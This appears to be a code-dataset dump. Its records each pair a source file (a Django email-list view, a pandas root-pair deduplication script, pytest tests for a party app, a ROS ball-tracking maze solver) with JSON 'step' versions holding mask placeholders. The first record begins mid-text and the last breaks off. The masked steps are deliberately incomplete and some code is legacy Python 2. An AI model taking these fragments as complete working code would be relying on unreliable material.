값 (index.html에서 input으로 받은 password) 을 가져와서 데이터베이스(emailist)의 last_name column에 저장\n emaillist.email = request.POST['email'] # 웹에 email부분에 작성한 값 (index.html에서 input으로 받은 password) 을 가져와서 데이터베이스(emailist)의 email column에 저장\n\n emaillist.save() # 저장된 내역을 DB에 저장\n\n return HttpResponseRedirect('/emaillist') # 저장완료되면 기존 리스트 페이지로 이동\n#\n# def add2(request):\n# emaillist2 = Emaillist2()\n# emaillist2.first_name = request.POST['fn']\n# emaillist2.last_name = request.POST['ln']\n# emaillist2.email = request.POST['email']\n#\n# emaillist2.save()\n#\n# return HttpResponseRedirect('/emaillist')",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
"""Deduplicate complex root pairs found by a search run.

Reads search.csv (columns re_0, im_0, re_1, im_1), orders each pair so the
root with the smaller real part comes first, sorts by re_0, then drops rows
whose pair is within `eps` (L1 distance) of the previous row's pair.
Writes the surviving pairs to filtered.csv.

Fixes over the original: Python 2 print statements replaced (the module
would not even parse on Python 3), the removed pandas `.ix` indexer
replaced with `.loc`, the output file is closed via a context manager, and
the dead commented-out block was removed.
"""
import pandas as pd

df = pd.read_csv("search.csv")

# Normalize pair order: the root with the smaller real part goes first.
df0 = df[df['re_0'] < df['re_1']]
df1 = df[df['re_0'] > df['re_1']].loc[:, ['re_1', 'im_1', 're_0', 'im_0']]
df1.columns = ['re_0', 'im_0', 're_1', 'im_1']
df = pd.concat([df0, df1]).sort_values(by=["re_0"])

eps = 1e-4  # L1 tolerance below which two consecutive pairs are duplicates
res = []
val_old = None
for _, val in df.iterrows():
    z0 = val['re_0'] + 1j * val['im_0']
    z1 = val['re_1'] + 1j * val['im_1']
    if val_old is None:
        # Always keep the first row.
        res.append([z0, z1])
    else:
        z0_old = val_old['re_0'] + 1j * val_old['im_0']
        z1_old = val_old['re_1'] + 1j * val_old['im_1']
        if abs(z0_old - z0) + abs(z1_old - z1) > eps:
            res.append([z0, z1])
    val_old = val

with open('filtered.csv', 'w') as f:
    for z0, z1 in res:
        f.write("{0},{1},{2},{3}\n".format(z0.real, z0.imag, z1.real, z1.imag))
|
normal
|
{
"blob_id": "709e54daea4fea112539af3da83b00a43a086399",
"index": 2629,
"step-1": "import pandas as pd\n\ndf = pd.read_csv(\"search.csv\")\n\n\ndf0 = df[df['re_0']<df['re_1']]\ndf1 = df[df['re_0']>df['re_1']].ix[:, ['re_1', 'im_1', 're_0', 'im_0']]\ndf1.columns = ['re_0', 'im_0', 're_1', 'im_1']\ndf = pd.concat([df0, df1]).sort_values(by=[\"re_0\"])\n\neps = pow(10.0, -4.0)\nfirst = True\nres = []\nval_old = None\nfor (k, val) in df.iterrows():\n z0 = val['re_0']+1.0j*val['im_0']\n z1 = val['re_1']+1.0j*val['im_1']\n\n if (first):\n res.append([z0, z1])\n first = False\n else:\n z0_old = val_old['re_0']+1.0j*val_old['im_0']\n z1_old = val_old['re_1']+1.0j*val_old['im_1']\n print k, z0, z1, abs(z0_old-z0)+ abs(z1_old-z1)\n if(abs(z0_old-z0) + abs(z1_old-z1) >eps):\n res.append([z0, z1])\n \n val_old = val\n\nf = open('filtered.csv', 'w')\nfor [z0, z1] in res:\n print >>f, \"{0},{1},{2},{3}\".format(z0.real, z0.imag, z1.real, z1.imag)\n \n\"\"\"\nfor i in range(len(df)-1):\n print i\n z0 = df.ix[i,:]['re_0'] + 1.0j * df.ix[i,:]['im_0']\n z1 = df.ix[i,:]['re_1'] + 1.0j * df.ix[i,:]['im_1']\n z0p = df.ix[i+1,:]['re_0'] + 1.0j * df.ix[i+1,:]['im_0']\n z1p = df.ix[i+1,:]['re_1'] + 1.0j * df.ix[i+1,:]['im_1']\n if(abs(z0-z0p)>eps and abs(z1-z1p)>eps):\n res.append([z0p, z1p])\n\nprint res\nprint len(df)\n\n\"\"\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import unittest
from app.party import Party
from app.guest import Guest
from app.shoppingList import ShoppingList
def test_aPartywithNoGuestsShouldHaveNoPartyGuests():
party = Party()
assert 0 == party.numberOfGuests()
def test_aPartywithOneGuestShouldHaveOnePartyGuest():
party = Party()
lisa = Guest("Lisa", 'female')
party.attendedBy(lisa)
assert 1 == party.numberOfGuests()
def test_aPartywithThreeGuestsShouldHaveThreeGuests():
party = Party()
lisa = Guest("Lisa", 'female')
rob = Guest("Rob", 'male')
susan = Guest("susan", 'female')
party.attendedBy(lisa)
party.attendedBy(rob)
party.attendedBy(susan)
assert 3 == party.numberOfGuests()
def test_aGuestShouldBeAbleToLeaveAParty():
party = Party()
lisa = Guest("Lisa", 'female')
rob = Guest("Rob", 'male')
susan = Guest("susan", 'female')
party.attendedBy(lisa)
party.attendedBy(rob)
party.attendedBy(susan)
party.leftBy(rob)
assert 2 == party.numberOfGuests()
def test_aPartyShouldHaveALocation():
party = Party()
party.setLocation("my House")
assert "my House" == party.getLocation()
def test_aGuestShouldRevealHerName():
guest1 = Guest("Lisa", "female")
assert "Lisa" == guest1.hasName()
def test_weShouldKnowWhoIsAtTheParty():
party = Party()
lisa = Guest("Lisa", 'female')
rob = Guest("Rob", 'male')
susan = Guest("susan", 'female')
party.attendedBy(lisa)
party.attendedBy(rob)
party.attendedBy(susan)
assert ["Lisa", "Rob", "susan"] == party.getAttendees()
def test_weShouldBeAbleToCreateAnEmptyShoppingList():
shoppingList = ShoppingList()
assert shoppingList.getItems() == []
def test_weShouldBeAbleToAddItemsToShoppingList():
shoppingList = ShoppingList()
shoppingList.add("milk")
assert shoppingList.getItems() == ["milk"]
def test_createShoppingListBasedOnParty():
shoppingList = ShoppingList()
party = Party()
lisa = Guest("Lisa", 'female')
rob = Guest("Rob", 'male')
susan = Guest("susan", 'female')
party.attendedBy(lisa)
party.attendedBy(rob)
party.attendedBy(susan)
shoppingList.baseOn(party)
assert shoppingList.getItems() == ["wine for 4", "food for 4"]
|
normal
|
{
"blob_id": "a8df6b575afbf6db415e0676a796623f2a9b7a70",
"index": 8416,
"step-1": "<mask token>\n\n\ndef test_aPartywithOneGuestShouldHaveOnePartyGuest():\n party = Party()\n lisa = Guest('Lisa', 'female')\n party.attendedBy(lisa)\n assert 1 == party.numberOfGuests()\n\n\ndef test_aPartywithThreeGuestsShouldHaveThreeGuests():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n assert 3 == party.numberOfGuests()\n\n\n<mask token>\n\n\ndef test_aPartyShouldHaveALocation():\n party = Party()\n party.setLocation('my House')\n assert 'my House' == party.getLocation()\n\n\ndef test_aGuestShouldRevealHerName():\n guest1 = Guest('Lisa', 'female')\n assert 'Lisa' == guest1.hasName()\n\n\n<mask token>\n\n\ndef test_weShouldBeAbleToAddItemsToShoppingList():\n shoppingList = ShoppingList()\n shoppingList.add('milk')\n assert shoppingList.getItems() == ['milk']\n\n\ndef test_createShoppingListBasedOnParty():\n shoppingList = ShoppingList()\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n shoppingList.baseOn(party)\n assert shoppingList.getItems() == ['wine for 4', 'food for 4']\n",
"step-2": "<mask token>\n\n\ndef test_aPartywithNoGuestsShouldHaveNoPartyGuests():\n party = Party()\n assert 0 == party.numberOfGuests()\n\n\ndef test_aPartywithOneGuestShouldHaveOnePartyGuest():\n party = Party()\n lisa = Guest('Lisa', 'female')\n party.attendedBy(lisa)\n assert 1 == party.numberOfGuests()\n\n\ndef test_aPartywithThreeGuestsShouldHaveThreeGuests():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n assert 3 == party.numberOfGuests()\n\n\ndef test_aGuestShouldBeAbleToLeaveAParty():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n party.leftBy(rob)\n assert 2 == party.numberOfGuests()\n\n\ndef test_aPartyShouldHaveALocation():\n party = Party()\n party.setLocation('my House')\n assert 'my House' == party.getLocation()\n\n\ndef test_aGuestShouldRevealHerName():\n guest1 = Guest('Lisa', 'female')\n assert 'Lisa' == guest1.hasName()\n\n\n<mask token>\n\n\ndef test_weShouldBeAbleToAddItemsToShoppingList():\n shoppingList = ShoppingList()\n shoppingList.add('milk')\n assert shoppingList.getItems() == ['milk']\n\n\ndef test_createShoppingListBasedOnParty():\n shoppingList = ShoppingList()\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n shoppingList.baseOn(party)\n assert shoppingList.getItems() == ['wine for 4', 'food for 4']\n",
"step-3": "<mask token>\n\n\ndef test_aPartywithNoGuestsShouldHaveNoPartyGuests():\n party = Party()\n assert 0 == party.numberOfGuests()\n\n\ndef test_aPartywithOneGuestShouldHaveOnePartyGuest():\n party = Party()\n lisa = Guest('Lisa', 'female')\n party.attendedBy(lisa)\n assert 1 == party.numberOfGuests()\n\n\ndef test_aPartywithThreeGuestsShouldHaveThreeGuests():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n assert 3 == party.numberOfGuests()\n\n\ndef test_aGuestShouldBeAbleToLeaveAParty():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n party.leftBy(rob)\n assert 2 == party.numberOfGuests()\n\n\ndef test_aPartyShouldHaveALocation():\n party = Party()\n party.setLocation('my House')\n assert 'my House' == party.getLocation()\n\n\ndef test_aGuestShouldRevealHerName():\n guest1 = Guest('Lisa', 'female')\n assert 'Lisa' == guest1.hasName()\n\n\ndef test_weShouldKnowWhoIsAtTheParty():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n assert ['Lisa', 'Rob', 'susan'] == party.getAttendees()\n\n\n<mask token>\n\n\ndef test_weShouldBeAbleToAddItemsToShoppingList():\n shoppingList = ShoppingList()\n shoppingList.add('milk')\n assert shoppingList.getItems() == ['milk']\n\n\ndef test_createShoppingListBasedOnParty():\n shoppingList = ShoppingList()\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n shoppingList.baseOn(party)\n assert shoppingList.getItems() == ['wine for 4', 'food for 4']\n",
"step-4": "<mask token>\n\n\ndef test_aPartywithNoGuestsShouldHaveNoPartyGuests():\n party = Party()\n assert 0 == party.numberOfGuests()\n\n\ndef test_aPartywithOneGuestShouldHaveOnePartyGuest():\n party = Party()\n lisa = Guest('Lisa', 'female')\n party.attendedBy(lisa)\n assert 1 == party.numberOfGuests()\n\n\ndef test_aPartywithThreeGuestsShouldHaveThreeGuests():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n assert 3 == party.numberOfGuests()\n\n\ndef test_aGuestShouldBeAbleToLeaveAParty():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n party.leftBy(rob)\n assert 2 == party.numberOfGuests()\n\n\ndef test_aPartyShouldHaveALocation():\n party = Party()\n party.setLocation('my House')\n assert 'my House' == party.getLocation()\n\n\ndef test_aGuestShouldRevealHerName():\n guest1 = Guest('Lisa', 'female')\n assert 'Lisa' == guest1.hasName()\n\n\ndef test_weShouldKnowWhoIsAtTheParty():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n assert ['Lisa', 'Rob', 'susan'] == party.getAttendees()\n\n\ndef test_weShouldBeAbleToCreateAnEmptyShoppingList():\n shoppingList = ShoppingList()\n assert shoppingList.getItems() == []\n\n\ndef test_weShouldBeAbleToAddItemsToShoppingList():\n shoppingList = ShoppingList()\n shoppingList.add('milk')\n assert shoppingList.getItems() == ['milk']\n\n\ndef test_createShoppingListBasedOnParty():\n shoppingList = ShoppingList()\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n 
shoppingList.baseOn(party)\n assert shoppingList.getItems() == ['wine for 4', 'food for 4']\n",
"step-5": "import unittest\nfrom app.party import Party\nfrom app.guest import Guest\nfrom app.shoppingList import ShoppingList\n\ndef test_aPartywithNoGuestsShouldHaveNoPartyGuests():\n\tparty = Party()\n\tassert 0 == party.numberOfGuests()\n\n\ndef test_aPartywithOneGuestShouldHaveOnePartyGuest():\n\tparty = Party()\n\tlisa = Guest(\"Lisa\", 'female')\n\tparty.attendedBy(lisa)\n\tassert 1 == party.numberOfGuests()\n\ndef test_aPartywithThreeGuestsShouldHaveThreeGuests():\n\tparty = Party()\n\tlisa = Guest(\"Lisa\", 'female')\n\trob = Guest(\"Rob\", 'male')\n\tsusan = Guest(\"susan\", 'female')\n\tparty.attendedBy(lisa)\n\tparty.attendedBy(rob)\n\tparty.attendedBy(susan)\n\tassert 3 == party.numberOfGuests()\n\ndef test_aGuestShouldBeAbleToLeaveAParty():\n\tparty = Party()\n\tlisa = Guest(\"Lisa\", 'female')\n\trob = Guest(\"Rob\", 'male')\n\tsusan = Guest(\"susan\", 'female')\n\tparty.attendedBy(lisa)\n\tparty.attendedBy(rob)\n\tparty.attendedBy(susan)\n\tparty.leftBy(rob)\n\tassert 2 == party.numberOfGuests()\n\ndef test_aPartyShouldHaveALocation():\n\tparty = Party()\n\tparty.setLocation(\"my House\")\n\tassert \"my House\" == party.getLocation()\n\n\ndef test_aGuestShouldRevealHerName():\n\tguest1 = Guest(\"Lisa\", \"female\")\n\tassert \"Lisa\" == guest1.hasName()\n\ndef test_weShouldKnowWhoIsAtTheParty():\n\tparty = Party()\n\tlisa = Guest(\"Lisa\", 'female')\n\trob = Guest(\"Rob\", 'male')\n\tsusan = Guest(\"susan\", 'female')\n\tparty.attendedBy(lisa)\n\tparty.attendedBy(rob)\n\tparty.attendedBy(susan)\n\tassert [\"Lisa\", \"Rob\", \"susan\"] == party.getAttendees()\n\n\ndef test_weShouldBeAbleToCreateAnEmptyShoppingList():\n\tshoppingList = ShoppingList()\n\tassert shoppingList.getItems() == []\n\ndef test_weShouldBeAbleToAddItemsToShoppingList():\n\tshoppingList = ShoppingList()\n\tshoppingList.add(\"milk\")\n\tassert shoppingList.getItems() == [\"milk\"]\n\n\ndef test_createShoppingListBasedOnParty():\n\tshoppingList = ShoppingList()\n\tparty = 
Party()\n\tlisa = Guest(\"Lisa\", 'female')\n\trob = Guest(\"Rob\", 'male')\n\tsusan = Guest(\"susan\", 'female')\n\tparty.attendedBy(lisa)\n\tparty.attendedBy(rob)\n\tparty.attendedBy(susan)\n\tshoppingList.baseOn(party)\n\tassert shoppingList.getItems() == [\"wine for 4\", \"food for 4\"]\n\n\n",
"step-ids": [
6,
8,
9,
10,
12
]
}
|
[
6,
8,
9,
10,
12
] |
#!/usr/bin/env python
# including libraries
import roslib
import sys
import rospy
import cv2
import math
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
import matplotlib.pyplot as plt
MAP = np.array([[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1,0,1,1,0],[0,1,0,1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,1,0],[0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,0],[0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0],[0,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1,1,1,1,0],[0,0,0,0,0,1,0,0,0,1,0,1,0,1,0,0,0,0,1,0],[0,1,1,1,0,1,0,1,1,1,0,1,1,1,0,1,1,1,1,0],[0,1,0,1,0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0],[0,1,0,1,0,1,0,1,0,1,1,1,0,1,1,1,1,1,1,0],[0,1,0,1,0,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0],[0,1,0,1,1,1,0,1,0,1,0,1,1,1,0,1,1,1,1,0],[0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0],[0,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1,1,1,1,0],[0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0],[0,1,0,1,1,1,1,1,1,0,1,1,1,0,1,1,1,0,1,0],[0,1,0,1,0,0,0,0,1,0,1,0,1,0,1,0,1,0,1,0],[0,1,0,1,0,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0],[0,1,0,1,1,1,1,0,1,1,1,0,1,1,1,0,1,1,1,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]])
position_history = (0,0)
class labyrinth_solver:
def __init__(self):
self.image_pub = rospy.Publisher("final_image",Image)
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("/usb_cam/image_raw",Image,self.callback)
def callback(self,data):
try:
cv_image = self.bridge.imgmsg_to_cv2(data, desired_encoding="bgr8")
except CvBridgeError, e:
print e
# crop out the labyrinth region (y by x)
cv_image = cv_image[22:240, 44:268]
# resize the image to 200x200 each region is 10x10
cv_image = cv2.resize(cv_image, (400, 400))
# transfer the image from RGB to HSV
hsv_image = cv2.cvtColor(cv_image, cv2.COLOR_BGR2HSV)
# Red Ball Segmentation
lower_red = np.array([0,50,150])
upper_red = np.array([50,150,250])
temp_ball = cv2.inRange(hsv_image,lower_red,upper_red)
# Erosion and Dilation processing
kernel = np.ones((3,3),np.uint8)
temp_ball = cv2.dilate(temp_ball,kernel,iterations = 2)
#cv2.imshow("Red Ball", temp_ball)
# Calculate the contour
contours,hierarcy = cv2.findContours(temp_ball,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
# Select the biggest contout as the target
max_area = 0
for cnt in contours:
area=cv2.contourArea(cnt)
if area > max_area:
max_area=area
target = cnt
global position_history # calling global variable
# handling with target missing
if max_area >= 10:
(x,y),radius = cv2.minEnclosingCircle(target)
center = (int(x),int(y))
else:
center = position_history
# Compensate with some noise
radius = 10
if abs(center[0]-position_history[0])+abs(center[1]-position_history[1])<=4:
center = position_history
cv2.circle(cv_image,center,radius,(0,255,0),2)
position_history = center
cv2.imshow("Ball tracking", cv_image)
# manipulate the center coordinate to be the nearest 10 while extract the position in 20 by 20
# FIRST check who is more close to 0
checkx = center[0]%20-10
checky = center[1]%20-15
if abs(checkx) <= abs(checky):
newx = center[0] - checkx
newy = center[1]*0.955
elif abs(checkx) > abs(checky):
newx = center[0]
newy = 0.955*(center[1] - checky)
newcenter = (newx, int(newy))
# read the reference map for animation
map_ref = cv2.imread('/home/sunyue/catkin_ws/src/tracking/map.png')
cv2.circle(map_ref,newcenter,radius,(0,0,255),-5)
# SECOND transfer the real location to the 20x20 grid
gridx = newcenter[0]/20+1
gridy = newcenter[1]/20+1
# A* for path planning
goal = [10,2]
current = [gridx, gridy]
precheck = abs(current[0]-goal[0])+abs(current[1]-goal[1])
if precheck == 0: check = 0
else: check = 100
path = np.array([current])
backup = np.array([[0,0,0,0]])
while check!=0:
# generate the potential candidate
north = [current[0],current[1]-1]
south = [current[0],current[1]+1]
east = [current[0]+1,current[1]]
west = [current[0]-1,current[1]]
#print current
# calculate the heuristic
n_heuristic = math.sqrt(pow(north[0]-goal[0],2)+pow(north[1]-goal[1],2))
s_heuristic = math.sqrt(pow(south[0]-goal[0],2)+pow(south[1]-goal[1],2))
e_heuristic = math.sqrt(pow(east[0]-goal[0],2)+pow(east[1]-goal[1],2))
w_heuristic = math.sqrt(pow(west[0]-goal[0],2)+pow(west[1]-goal[1],2))
# check the punishment of obstacle
if MAP[north[1]-1,north[0]-1]==0: n_punish = 2000
else: n_punish = 0
if MAP[south[1]-1,south[0]-1]==0: s_punish = 2000
else: s_punish = 0
if MAP[east[1]-1,east[0]-1]==0: e_punish = 2000
else: e_punish = 0
if MAP[west[1]-1,west[0]-1]==0: w_punish = 2000
else: w_punish = 0
#print n_punish, s_punish, e_punish, w_punish
# check last node never go back
num = path.shape[0] # get the path step number
if num!=1:
last_step = path[-2]
n_check = north - last_step
s_check = south - last_step
e_check = east - last_step
w_check = west - last_step
if ( n_check[0]==0 and n_check[1]==0): n_punish = 2000
if ( s_check[0]==0 and s_check[1]==0): s_punish = 2000
if ( e_check[0]==0 and e_check[1]==0): e_punish = 2000
if ( w_check[0]==0 and w_check[1]==0): w_punish = 2000
# sum the cost together
n_cost = int(n_heuristic + n_punish)
s_cost = int(s_heuristic + s_punish)
e_cost = int(e_heuristic + e_punish)
w_cost = int(w_heuristic + w_punish)
cost = [n_cost, s_cost, e_cost, w_cost]
# there will be some situations should be taken into consideration
index = np.argmin(cost) # where the smallest cost is located
mincost = cost[index]
# First only one direction cost is less than 1000, then just pick that
if mincost<=1000: # there must be at least one solution
sumcheck = cost[0]+cost[1]+cost[2]+cost[3]
if sumcheck >= 6000: # only one next choice
if index == 0: next = north
elif index == 1: next = south
elif index == 2: next = east
elif index == 3: next = west
# update the path
path = np.append(path,[next],axis=0)
# update the check for next while
precheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])
if precheck == 0:
check = 0
# updat the current
current = next
elif (sumcheck >= 4000 and sumcheck < 6000) : # two posible choices
if index == 0: next = north
elif index == 1: next = south
elif index == 2: next = east
elif index == 3: next = west
# update the path choose the one have the least cost
path = np.append(path,[next],axis=0)
# update the check for next while
precheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])
if precheck == 0:
check = 0
# save the branch to the back up [current, branch]
fakecost = cost
fakecost[index] = 2000 # mannually fake the minimum cost choice
fakeindex = np.argmin(fakecost) # where the smallest cost is located
if fakeindex == 0: branch = north
elif fakeindex == 1: branch = south
elif fakeindex == 2: branch = east
elif fakeindex == 3: branch = west
backup = np.append([[current[0],current[1],branch[0],branch[1]]], backup, axis=0)
# updat the current
current = next
elif (sumcheck >= 2000 and sumcheck < 4000) : # three posible choices
if index == 0: next = north
elif index == 1: next = south
elif index == 2: next = east
elif index == 3: next = west
# update the path choose the one have the least cost
path = np.append(path,[next],axis=0)
# update the check for next while
precheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])
if precheck == 0:
check = 0
# save the branch to the back up [current, branch]
# second cost
secondcost = cost
secondcost[index] = 2000 # mannually fake the minimum cost choice
secondindex = np.argmin(secondcost) # where the smallest cost is located
if secondindex == 0: branch1 = north
elif secondindex == 1: branch1 = south
elif secondindex == 2: branch1 = east
elif secondindex == 3: branch1 = west
thirdcost = secondcost
thirdcost[secondindex] = 2000 # mannually fake the minimum cost choice
thirdindex = np.argmin(thirdcost) # where the smallest cost is located
if thirdindex == 0: branch2 = north
elif thirdindex == 1: branch2 = south
elif thirdindex == 2: branch2 = east
elif thirdindex == 3: branch2 = west
# update branch based on cost difference
backup = np.append([[current[0],current[1],branch2[0],branch2[1]]], backup, axis=0)
backup = np.append([[current[0],current[1],branch1[0],branch1[1]]], backup, axis=0)
# updat the current
current = next
elif mincost>=2000: # there is no next choice we have go to backup branchs
# next step is the first ranking branch
next = [backup[0,2],backup[0,3]]
# cut the path back
current = [backup[0,0],backup[0,1]]
compare = abs(path-current)
summation = sum(np.transpose(compare))
index = np.argmin(summation)
# cut the path from 0 to current one
path = path[:index+1]
# update the path with next step
path = np.append(path,[next],axis=0)
# delete the first backup
backup = backup[1:]
# update the check for next while
precheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])
if precheck == 0:
check = 0
# updat the current
current = next
# A* algorithm is ended
steps = path.shape[0]
i = 0
while i < steps-1:
cv2.line(map_ref,(20*path[i,0]-10,20*path[i,1]-10),(20*path[i+1,0]-10,20*path[i+1,1]-10),(255,0,0),3)
i = i+1
cv2.imshow("Map Image", map_ref)
cv2.waitKey(1)
try:
self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, encoding="bgr8"))
except CvBridgeError, e:
print e
def main(args):
ic = labyrinth_solver()
rospy.init_node('labyrinth_solver', anonymous=True)
try:
rospy.spin()
except KeyboardInterrupt:
print "Shutting down"
cv2.destroyAllWindows()
if __name__ == '__main__':
main(sys.argv)
|
normal
|
{
"blob_id": "b30e6af035b589d5f4bd1bc6cccdd53c157861a0",
"index": 2144,
"step-1": "#!/usr/bin/env python\n\n# including libraries\nimport roslib\nimport sys\nimport rospy\nimport cv2\nimport math\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nMAP = np.array([[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1,0,1,1,0],[0,1,0,1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,1,0],[0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,0],[0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0],[0,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1,1,1,1,0],[0,0,0,0,0,1,0,0,0,1,0,1,0,1,0,0,0,0,1,0],[0,1,1,1,0,1,0,1,1,1,0,1,1,1,0,1,1,1,1,0],[0,1,0,1,0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0],[0,1,0,1,0,1,0,1,0,1,1,1,0,1,1,1,1,1,1,0],[0,1,0,1,0,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0],[0,1,0,1,1,1,0,1,0,1,0,1,1,1,0,1,1,1,1,0],[0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0],[0,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1,1,1,1,0],[0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0],[0,1,0,1,1,1,1,1,1,0,1,1,1,0,1,1,1,0,1,0],[0,1,0,1,0,0,0,0,1,0,1,0,1,0,1,0,1,0,1,0],[0,1,0,1,0,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0],[0,1,0,1,1,1,1,0,1,1,1,0,1,1,1,0,1,1,1,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]])\n\nposition_history = (0,0)\n\n\nclass labyrinth_solver:\n\n\tdef __init__(self):\n\t\tself.image_pub = rospy.Publisher(\"final_image\",Image)\n\t\tself.bridge = CvBridge()\n\t\tself.image_sub = rospy.Subscriber(\"/usb_cam/image_raw\",Image,self.callback)\n\n\tdef callback(self,data):\n\t\ttry:\n\t\t\tcv_image = self.bridge.imgmsg_to_cv2(data, desired_encoding=\"bgr8\")\n\t\texcept CvBridgeError, e:\n\t\t\tprint e\n\t\t\n\t\t# crop out the labyrinth region (y by x)\n\t\tcv_image = cv_image[22:240, 44:268]\n\t\t# resize the image to 200x200 each region is 10x10\n\t\tcv_image = cv2.resize(cv_image, (400, 400)) \n\t\t# transfer the image from RGB to HSV\n\t\thsv_image = cv2.cvtColor(cv_image, cv2.COLOR_BGR2HSV)\n\n\t\t# Red Ball Segmentation\n\t\tlower_red = np.array([0,50,150])\n\t\tupper_red = np.array([50,150,250])\n\t\ttemp_ball = 
cv2.inRange(hsv_image,lower_red,upper_red)\n\t\t# Erosion and Dilation processing\n\t\tkernel = np.ones((3,3),np.uint8)\n\t\ttemp_ball = cv2.dilate(temp_ball,kernel,iterations = 2)\n\t\t#cv2.imshow(\"Red Ball\", temp_ball)\n\t\t# Calculate the contour\n\t\tcontours,hierarcy = cv2.findContours(temp_ball,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\t\t# Select the biggest contout as the target\t\t\n\t\tmax_area = 0\n\t\tfor cnt in contours:\n\t\t\tarea=cv2.contourArea(cnt)\n\t\t\tif area > max_area:\n\t\t\t\tmax_area=area\n\t\t\t\ttarget = cnt\n\n\t\t\n\t\tglobal position_history # calling global variable\n\t\t# handling with target missing\n\t\tif max_area >= 10:\n\t\t\t(x,y),radius = cv2.minEnclosingCircle(target)\n\t\t\tcenter = (int(x),int(y))\n\t\telse:\n\t\t\tcenter = position_history\n\t\t# Compensate with some noise\n\t\tradius = 10\n\t\tif abs(center[0]-position_history[0])+abs(center[1]-position_history[1])<=4:\n\t\t\tcenter = position_history\n\t\tcv2.circle(cv_image,center,radius,(0,255,0),2)\n\t\tposition_history = center\n\t\tcv2.imshow(\"Ball tracking\", cv_image)\n\t\t\n\n\t\t# manipulate the center coordinate to be the nearest 10 while extract the position in 20 by 20\t\t\n\t\t# FIRST check who is more close to 0\t\n\t\tcheckx = 